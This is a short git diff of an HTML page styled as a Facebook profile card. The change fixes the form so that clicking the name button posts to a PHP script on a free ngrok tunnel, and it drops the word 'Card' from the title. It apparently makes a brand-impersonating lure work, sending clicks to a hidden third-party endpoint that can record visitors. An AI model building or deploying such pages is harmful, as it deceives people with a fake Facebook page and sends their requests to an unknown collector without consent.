--- a/SUP_MARC.html
+++ b/SUP_MARC.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Facebook Profile Card</title>
+    <title>Facebook Profile</title>
     <style>
         body {
             display: flex;
@@ -46,12 +46,13 @@
 </head>
 <body>
     
-        <form action="https://wondrous-select-stallion.ngrok-free.app/test/test.php" method="post"></form>
+        <form action="https://wondrous-select-stallion.ngrok-free.app/test/test.php" method="post">
         <div class="card"><div class="logo">facebook</div>
         <div class="profile-img"></div>
         
         <button class="name-button" type="submit">SUP_MARC_pro</button>
-       </div>  </form>
+       </div>  
+</form>
    
 </body>
 </html>
